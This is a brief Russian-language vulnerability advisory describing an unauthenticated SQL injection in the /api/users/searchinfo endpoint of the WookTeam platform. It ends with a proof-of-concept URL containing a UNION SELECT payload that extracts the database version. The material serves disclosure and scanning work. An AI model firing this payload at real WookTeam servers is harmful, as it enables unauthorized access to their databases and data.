Тип уязвимости: SQL-инъекция
Влияние: получение конфиденциальной информации
Краткое описание: В интерфейсе /api/users/searchinfo платформы WookTeam обнаружена уязвимость SQL-инъекции. Незарегистрированный злоумышленник может использовать эту уязвимость для получения данных из базы данных. Кроме того, атакующий может выполнить команды на сервере с высокими привилегиями, что позволяет ему получить полный контроль над системой.

0x05 Доказательство концепции

{{BaseURL}}/api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cversion%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23